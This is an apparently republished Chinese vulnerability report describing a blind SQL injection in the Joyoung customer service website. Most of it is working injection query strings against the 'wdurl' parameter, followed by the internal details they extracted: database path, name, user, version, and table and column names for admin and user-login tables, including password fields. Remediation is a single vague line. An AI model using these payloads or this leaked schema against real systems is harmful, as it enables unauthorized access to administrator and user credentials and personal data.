九阳客户服务中心网站存在mysql字符型盲注(可获得管理员和全部的注册用户信息):
?
page.curPage=1&page.zongPageStr=7&page.zongNumsStr=105&page.fen=15&rzong=105&wdname=&wdsort=&wdcode=&wdsheng=&wdshi=&fuzeren=&wdurl='%20aNd%20'a'%20lIke%20'a
?
page.curPage=1&page.zongPageStr=7&page.zongNumsStr=105&page.fen=15&rzong=105&wdname=&wdsort=&wdcode=&wdsheng=&wdshi=&fuzeren=&wdurl='%20and%20(select%20length(database()))=12%20aNd%20's'%20lIke%20's
?
page.curPage=1&page.zongPageStr=7&page.zongNumsStr=105&page.fen=15&rzong=105&wdname=&wdsort=&wdcode=&wdsheng=&wdshi=&fuzeren=&wdurl='%20and%20(select%20abs(ascii(substr(database(),1,1))))=107%20and%20108%20aNd%20's'%20lIke%20's
...
...
...
and so on!
数据库文件目录: /var/lib/mysql/
当前数据库名: kfjoyoungscf
当前用户名: service127@localhost
数据库版本: 5.5.11-log
当前数据库的部分表名:
t_adminuser
t_diaocha
t_grade
t_hint
t_joyperson
t_joyuserlogin
t_jubao
t_liucheng
t_minglie
t_myproduct
t_newsbankuai
...
t_joyuserlogin表的部分列名:
joyloginid
joyloginname
joypasswd
joytype
joypasswdt
registertime
lastlogintime
todaylogintimes
totaltimes
email
...
修复方案:
进行必要的过滤!
作者:leaf
,www.xuhantao.com,涛涛电脑知识网